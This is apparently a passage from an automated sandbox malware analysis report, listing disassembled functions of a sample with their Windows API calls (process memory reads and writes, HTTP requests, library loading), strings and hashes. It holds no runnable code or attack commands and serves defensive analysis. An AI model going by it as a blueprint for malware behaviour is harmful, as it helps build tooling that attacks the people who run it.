                                                                            • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCopyInit_malloc
                                                                            • String ID: 4RH
                                                                            • API String ID: 2981388473-749298218
                                                                            • Opcode ID: 8597c41bd6bd9e5c70c8eccbc8cf2b8b8044ff49b8f1509b14a04f4898846acd
                                                                            • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                            • Opcode Fuzzy Hash: 8597c41bd6bd9e5c70c8eccbc8cf2b8b8044ff49b8f1509b14a04f4898846acd
                                                                            • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                            Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • __wcsnicmp.LIBCMT ref: 0046681A
                                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                            • String ID: LPT$HH
                                                                            • API String ID: 3035604524-2728063697
                                                                            • Opcode ID: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                            • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                            • Opcode Fuzzy Hash: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                            • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                            Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32 ref: 004374E2
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                              • Part of subcall function 00437472: ReadProcessMemory.KERNEL32 ref: 004374A5
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                            • String ID: @
                                                                            • API String ID: 4055202900-2766056989
                                                                            • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                            • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                            • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                            • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                            Function 00449A93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00449B2E
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449B9C
                                                                            • SendMessageW.USER32(002BE158,00000469,?,00000000), ref: 00449BF7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageMoveRectSend
                                                                            • String ID: X+
                                                                            • API String ID: 4269771112-1938338529
                                                                            • Opcode ID: 4d19423c0bfc3f881ab8ca646a671160d9b3563d522f9926aab549df03f0587c
                                                                            • Instruction ID: e508488f702fbc50c1559f6c7ec12802fe4172382056b8995399bf84c1675f17
                                                                            • Opcode Fuzzy Hash: 4d19423c0bfc3f881ab8ca646a671160d9b3563d522f9926aab549df03f0587c
                                                                            • Instruction Fuzzy Hash: 89419A70204641AFE724CF24D881E7BB7A9FB89714F008A1EF19197351E774BD80DBA9
                                                                            Function 00440BD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MoveWindow.USER32(?,004A83D8,00000000,?,?,00000000), ref: 00440DC7
                                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440DE6
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00440E0C
                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00440E3E
                                                                            • ShowWindow.USER32(?,00000000), ref: 00440E62
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440E7E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$InvalidateMoveProcRectShow
                                                                            • String ID: X+
                                                                            • API String ID: 4037296999-1938338529
                                                                            • Opcode ID: d1c57b00791a8315eaa483b8e66cc43cf618c503a38761f2299fd22608959c2a
                                                                            • Instruction ID: bcda879dc66b10d245a90a7ed40df89d10d9938a03d93e03f7abdd0b7ff48564
                                                                            • Opcode Fuzzy Hash: d1c57b00791a8315eaa483b8e66cc43cf618c503a38761f2299fd22608959c2a
                                                                            • Instruction Fuzzy Hash: D45178B06087028BE324CF68C98076BB7E1FF88B44F14491EFAD597250E738B95ACB55
                                                                            Function 00440BD2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MoveWindow.USER32(?,004A83D8,00000000,?,?,00000000), ref: 00440DC7
                                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440DE6
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00440E0C
                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00440E3E
                                                                            • ShowWindow.USER32(?,00000000), ref: 00440E62
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440E7E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$InvalidateMoveProcRectShow
                                                                            • String ID: X+
                                                                            • API String ID: 4037296999-1938338529
                                                                            • Opcode ID: fc410d95a4fe0568344445656b193ee776445bfad3aebd2bbff95d421bbcaa9c
                                                                            • Instruction ID: 2b46c7824bf4544c0e391e94ea7ff91743a1a3c2accfc933bdfb9e377f3e5a16
                                                                            • Opcode Fuzzy Hash: fc410d95a4fe0568344445656b193ee776445bfad3aebd2bbff95d421bbcaa9c
                                                                            • Instruction Fuzzy Hash: 6F5178B06087028BE324CF68C98176BB7E1BF88B44F14491EFAD597250E738B959CB56
                                                                            Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset_wcslen
                                                                            • String ID: |
                                                                            • API String ID: 915713708-2343686810
                                                                            • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                            • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                            • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                            • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                            Function 0044A7DC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                            • HttpQueryInfoW.WININET ref: 0044A892
                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3705125965-3916222277
                                                                            • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                            • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                            • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                            • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                            Function 004509D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000,?,000000F0), ref: 00450AB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                            • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                            • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                            • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                            Function 00437CA6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                            • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: AU3_GetPluginDetails
                                                                            • API String ID: 145871493-4132174516
                                                                            • Opcode ID: 06d0308278136abd8afe0949b03919407905039ce5a8e3307e807f7905fa9d8e
                                                                            • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                            • Opcode Fuzzy Hash: 06d0308278136abd8afe0949b03919407905039ce5a8e3307e807f7905fa9d8e
                                                                            • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                            Function 00448358 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '$X+
                                                                            • API String ID: 3850602802-3202472624
                                                                            • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                            • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                            • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                            • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                            Function 00449CA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X+
                                                                            • API String ID: 0-1938338529
                                                                            • Opcode ID: 633f152619b8c30162dc95440fdbfca099532ca417aaceaec9bd175afbce1397
                                                                            • Instruction ID: 4fa5f01c85a4c09be7d325946a2a49cd9db50b3972f2018ab6b13a1314af769f
                                                                            • Opcode Fuzzy Hash: 633f152619b8c30162dc95440fdbfca099532ca417aaceaec9bd175afbce1397
                                                                            • Instruction Fuzzy Hash: DC21B272244210ABF3109B49AD84FBBB3A8EBE5721F10452FF240E61D0D6A6A8129669
                                                                            Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                            • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 0045125D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                            • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                            • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                            • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                            Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                            • GetVolumeInformationW.KERNEL32 ref: 0045D2C7
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: HH
                                                                            • API String ID: 2507767853-2761332787
                                                                            • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                            • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                            • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                            • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                            Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                            • GetVolumeInformationW.KERNEL32 ref: 0045D4CE
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: HH
                                                                            • API String ID: 2507767853-2761332787
                                                                            • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                            • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                            • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                            • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                            Function 004515AB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,00000001,?), ref: 004515DA
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                            Strings
                                                                            • edit, xrefs: 00451651
                                                                            • 9aec3bede5bc963c9f658347f6bf9454ec55d0cc173df73d62f569748da7f94e0df043e2f55034834ab2e6ba84dc2e32e376ab574ffabc601897b0c7279b808d40, xrefs: 004515C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: 9aec3bede5bc963c9f658347f6bf9454ec55d0cc173df73d62f569748da7f94e0df043e2f55034834ab2e6ba84dc2e32e376ab574ffabc601897b0c7279b808d40$edit
                                                                            • API String ID: 2978978980-2171819551
                                                                            • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                            • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                            • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
